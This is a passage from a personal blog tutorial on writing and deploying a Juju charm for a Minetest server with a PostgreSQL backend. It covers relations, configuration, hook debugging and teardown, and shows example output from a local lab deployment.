Deploying charm "local:eoan/minetest-server-0".
</code></pre></div></div>
<p>Now we can check Juju status to see how it went:</p>
<p><img src="/assets/images/2019_275.png" alt="status" /></p>
<p>As you can see, my deploy went badly and got stuck on the install hook. Seems
I forgot to set apt to automatically answer yes to commands. Ah well.</p>
<p>If this happens to you, you can remove the machine with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ juju remove-machine 1 --force
removing machine 1
- will remove unit minetest-server/0
$ juju remove-application minetest-server
removing application minetest-server
</code></pre></div></div>
<p>Just make sure you get the correct machine number from <code class="language-plaintext highlighter-rouge">juju status</code>.</p>
<p>Fix your mistakes, and then try and try again:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ juju deploy ~/charms/minetest-server --series eoan
Deploying charm "local:eoan/minetest-server-0".
</code></pre></div></div>
<p>Eventually after enough revisions of fixing things, our Charm will be deployed
and will be waiting for a database connection:</p>
<p><img src="/assets/images/2019_277.png" alt="blocked" /></p>
<p>Time to get Minetest connected to PostgreSQL.</p>
<h3 id="add-relations">Add Relations</h3>
<p>As we learned in the previous blog post, relations are connections between two
Charms, where a Charm provides a service to another. In this case, we want the
PostgreSQL Charm to offer database services to Minetest.</p>
<p>We can add a relation with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ juju add-relation postgresql:db minetest-server:db
</code></pre></div></div>
<p>Juju will automatically go and call the <code class="language-plaintext highlighter-rouge">db-relation-changed</code> hook in the
minetest-server Charm, and also call the same in postgresql Charm. The PostgreSQL
Charm will go and create a new user, database and set up passwords and permissions
properly, so everything is ready for us to <code class="language-plaintext highlighter-rouge">relation-get</code> the information from
our <code class="language-plaintext highlighter-rouge">db-relation-changed</code> hook.</p>
<p>We probably want to verify that everything went well, since this was a particular
pain point in writing my charm.</p>
<p>We can issue <code class="language-plaintext highlighter-rouge">juju ssh</code> to get into the minetest-server unit, and from there
look to see if there are any database credentials in <code class="language-plaintext highlighter-rouge">world.mt</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ juju ssh 3
ubuntu@juju-adfa12-2:~$ cd /home/minetest/.minetest/worlds/world/
ubuntu@juju-adfa12-2:/home/minetest/.minetest/worlds/world$ ll
total 21444
drwxr-xr-x 2 minetest minetest 4096 Dec 1 21:46 ./
drwxr-xr-x 3 minetest minetest 4096 Dec 1 21:46 ../
-rw-r--r-- 1 minetest minetest 1054 Dec 1 22:04 world.mt
ubuntu@juju-adfa12-2:/home/minetest/.minetest/worlds/world$ cat world.mt
port = 30000
server_name = Minetest server
server_description = Juju deployed Minetest server
motd = Welcome!
strict_protocol_version_checking = false
creative_mode = false
enable_damage = false
default_password =
default_privs = build,shout
enable_pvp = true
gameid = minetest
backend = postgresql
player_backend = postgresql
auth_backend = sqlite3
pgsql_connection = host=10.72.102.206 port=5432 user=juju_minetest-server password=6yrPy37rM3GbPdzyZJGX29W5sX6jZdxJgYkJGF dbname=minetest-server
pgsql_player_connection = host=10.72.102.206 port=5432 user=juju_minetest-server password=6yrPy37rM3GbPdzyZJGX29W5sX6jZdxJgYkJGF dbname=minetest-server
</code></pre></div></div>
<p>Wow! Everything actually worked! Man, am I happy to see those credentials there.</p>
<p>Checking <code class="language-plaintext highlighter-rouge">juju status</code> once more should yield everything is okay:</p>
<p><img src="/assets/images/2019_278.png" alt="status" /></p>
<p>Time for the moment of truth. Can we connect to our server?</p>
<h3 id="start-minetest-client-and-connect-to-server">Start Minetest Client and Connect to Server</h3>
<p>There’s one more thing we have to do before enjoying a game of Minetest, and that
is opening the port of the game up to the world.</p>
<p>We can do this with <code class="language-plaintext highlighter-rouge">juju expose</code>.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ juju expose minetest-server
</code></pre></div></div>
<p>Go ahead and open up Minetest on your computer and click the “Join Game” tab.
From <code class="language-plaintext highlighter-rouge">juju status</code> we see our Minetest server is running on <code class="language-plaintext highlighter-rouge">10.72.102.109</code> on
the default port of <code class="language-plaintext highlighter-rouge">30000</code>.</p>
<p><img src="/assets/images/2019_279.png" alt="connect" /></p>
<p>Hit connect and…</p>
<p><img src="/assets/images/2019_280.png" alt="game" /></p>
<p>We are in the game, on a Juju deployed server!</p>
<h3 id="changing-and-reloading-configuration">Changing and Reloading Configuration</h3>
<p>Now that we can play the game, if we want to change any of the configuration
settings we wrote into the charm, we can use the Juju GUI, or the command line.</p>
<p>We can issue <code class="language-plaintext highlighter-rouge">juju config</code> to get a list of configuration options:</p>
<p><img src="/assets/images/2019_281.png" alt="config" /></p>
<p>We can change it by issuing <code class="language-plaintext highlighter-rouge">juju config</code> followed by a list of options:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ juju config minetest-server creative-mode=true
</code></pre></div></div>
<p>The <code class="language-plaintext highlighter-rouge">start</code> hook is automatically run after <code class="language-plaintext highlighter-rouge">config-changed</code>, which means once
<code class="language-plaintext highlighter-rouge">config-changed</code> has finished modifying the <code class="language-plaintext highlighter-rouge">world.mt</code> configuration file, the
server will automatically be restarted and the changed applied.</p>
<h2 id="debugging-the-charm">Debugging the Charm</h2>
<p>There will be times when you are writing your Charm and things just don’t work
as intended. Here are some ways that you can get more information on what is
happening.</p>
<h3 id="getting-juju-logs">Getting Juju Logs</h3>
<p>As mentioned before, if you run <code class="language-plaintext highlighter-rouge">juju debug-log</code> in another tab, you can keep
track of events, like specific hooks firing, and you can see a lot of detailed
error messages. This is the first place to look.</p>
<p><img src="/assets/images/2019_270.png" alt="debug" /></p>
<h3 id="manually-running-hooks">Manually Running Hooks</h3>
<p>Sometimes if your hooks aren’t working correctly, and you would like to debug
further, you can switch to a internal <code class="language-plaintext highlighter-rouge">tmux</code> session in Juju by running
<code class="language-plaintext highlighter-rouge">juju debug-hooks <application>/<unit id></code>.</p>
<p>For example:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ juju debug-hooks minetest-server/2
</code></pre></div></div>
<p><img src="/assets/images/2019_282.png" alt="tmux" /></p>
<p>This will allow you to run hook tools, such as <code class="language-plaintext highlighter-rouge">config-get</code>, <code class="language-plaintext highlighter-rouge">config-set</code>,
<code class="language-plaintext highlighter-rouge">relation-list</code>, <code class="language-plaintext highlighter-rouge">relation-get</code> and <code class="language-plaintext highlighter-rouge">relation-set</code>. For the relation tools, you
need to have a relation added first, and it usually works best when you remove
the relation, enter hook debugging, then re-add the relation while you are in
the tmux session.</p>
<p>From here you can run your hooks, and since they are suppose to be idempotent,
you can keep running them, and examining your systems, to see if your live changes
to the hooks work. The tmux session has vi and nano, so feel free to edit your
hooks on the fly.</p>
<p>The tmux session is already in the directory of your Charm, and you are root,
so you can modify anything.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@juju-adfa12-3:/var/lib/juju/agents/unit-minetest-server-2/charm# ls
README config.yaml copyright hooks icon.svg metadata.yaml revision
</code></pre></div></div>
<p>Hook debugging really helped me to get this Charm working.</p>
<h2 id="cleaning-up">Cleaning Up</h2>
<p>Once we have finished, We can shut down our services and remove them by issuing:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ juju remove-application minetest-server
removing application minetest-server
$ juju remove-application postgresql
removing application postgresql
</code></pre></div></div>
<p>To clean up our controller, we can issue <code class="language-plaintext highlighter-rouge">juju destory-controller</code>. Note that
will remove all deployments to all models, so you should probably be sure you
really want to do this before you run it.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>juju destroy-controller lxd-controller --destroy-all-models
WARNING! This command will destroy the "lxd-controller" controller.
This includes all machines, applications, data and other resources.
Continue? (y/N):y
Destroying controller
Waiting for hosted model resources to be reclaimed
Waiting on 1 model
All hosted models reclaimed, cleaning up controller machines
</code></pre></div></div>
<p>That’s it. All machines have been destroyed and we are back to a clean slate.</p>
<h1 id="conclusion">Conclusion</h1>
<p>There we have it. We wrote our first Charm, and successfully managed to Juju
deploy a Minetest server backed by a PostgreSQL database.</p>
<p>Along the way we learned what each part of the original method for writing
Charms does, how to operate hook tools and debug our Charm.</p>
<p>Maybe now I can actually sit down and play the game instead of spending all this
time writing the Charm, haha.</p>
<p>Hopefully you enjoyed the read, and as always feel free to <a href="/about">contact me</a>.</p>
<p>Matthew Ruffell</p>Matthew RuffellIn my previous blog post about Juju, a tool which lets you deploy and scale software easily, we learned what Juju is, how to deploy some common software packages, debug them, and scale them. Juju deploys Charms, a set of instructions on how to install, configure and scale a particular software package. To be able to deploy software as a Charm, a Charm has to be written first. Usually Charms are written by experts in operating that software package, so that the Charm represents the best way to configure and tune that application. But what happens if no Charm exists for something you want to deploy? Today we are going to learn how to write our own Charms using the original Charm writing method, by making a Charm for the Minetest game server. So fire up your favourite text editor, and lets get started.